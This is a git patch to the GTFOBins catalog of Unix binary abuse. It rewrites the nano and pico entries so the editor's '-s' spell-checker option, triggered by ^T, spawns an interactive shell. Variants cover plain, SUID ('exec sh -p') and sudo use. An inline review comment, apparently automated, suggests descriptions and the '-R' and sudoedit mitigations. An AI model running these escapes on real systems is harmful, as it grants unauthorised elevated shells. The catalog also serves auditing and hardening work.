From 7c0fa85a667688b8069835ea3d99b712f2429bd6 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Thu, 6 Sep 2018 21:36:02 +0200
Subject: [PATCH] Make nano/pico execute-interactive by using exec
---
 _gtfobins/nano.md | 20 +++++++-------------
 _gtfobins/pico.md | 20 +++++++-------------
 2 files changed, 14 insertions(+), 26 deletions(-)
diff --git a/_gtfobins/nano.md b/_gtfobins/nano.md
index 8004167..928ecc3 100644
--- a/_gtfobins/nano.md
+++ b/_gtfobins/nano.md
@@ -1,11 +1,9 @@
 ---
 functions:
- execute-non-interactive:
- - description: After running this exit the editor to see the command output.
- code: |
- COMMAND=id
+ execute-interactive:
+ - code: |
 TF=$(mktemp)
- echo "$COMMAND" > $TF
+ echo 'exec sh' > $TF
 chmod +x $TF
 nano -s $TF /etc/hosts
 ^T
@@ -17,20 +15,16 @@ functions:
 file-read:
 - code: nano file_to_read
 suid-enabled:
- - description: After running this exit the editor to see the command output.
- code: |
- COMMAND=id
+ - code: |
 TF=$(mktemp)
- echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
+ echo 'exec sh -p' > $TF
 chmod +x $TF
 ./nano -s $TF /etc/hosts
 ^T
 sudo-enabled:
- - description: After running this exit the editor to see the command output.
- code: |
- COMMAND=id
+ - code: |
 TF=$(mktemp)
- echo "$COMMAND" > $TF
+ echo 'exec sh' > $TF
 chmod +x $TF
 sudo nano -s $TF /etc/hosts
 ^T
diff --git a/_gtfobins/pico.md b/_gtfobins/pico.md
index e350ebf..e6dc547 100644
--- a/_gtfobins/pico.md
+++ b/_gtfobins/pico.md
@@ -1,11 +1,9 @@
 ---
 functions:
- execute-non-interactive:
- - description: After running this exit the editor to see the command output.
- code: |
- COMMAND=id
+ execute-interactive:
+ - code: |
 TF=$(mktemp)
- echo "$COMMAND" > $TF
+ echo 'exec sh' > $TF
 chmod +x $TF
 pico -s $TF /etc/hosts
 ^T
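Review bot: The rewritten entries in `_gtfobins/nano.md` (`execute-interactive` in the first hunk, `suid-enabled` and `sudo-enabled` in the second) lose their `description` field and get no replacement, so nothing on the page says which editor feature is involved; the same applies to both hunks of `_gtfobins/pico.md`. The visible commands pass the temp file through `-s`, the alternate spell-checker option, and `^T` is a keystroke inside the editor, not shell input. I would keep a one-line description on each entry, for example `description: The file given to -s is run as the spell checker when ^T is pressed in the editor.` That tells an administrator auditing a sudoers rule or a SUID bit what to restrict: nano's restricted mode (`-R`) disables spell checking, and `sudoedit` avoids running the editor with elevated privileges at all.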
@@ -17,20 +15,16 @@ functions:
 file-read:
 - code: pico file_to_read
 suid-enabled:
- - description: After running this exit the editor to see the command output.
- code: |
- COMMAND=id
+ - code: |
 TF=$(mktemp)
- echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
+ echo 'exec sh -p' > $TF
 chmod +x $TF
 ./pico -s $TF /etc/hosts
 ^T
 sudo-enabled:
- - description: After running this exit the editor to see the command output.
- code: |
- COMMAND=id
+ - code: |
 TF=$(mktemp)
- echo "$COMMAND" > $TF
+ echo 'exec sh' > $TF
 chmod +x $TF
 sudo pico -s $TF /etc/hosts
 ^T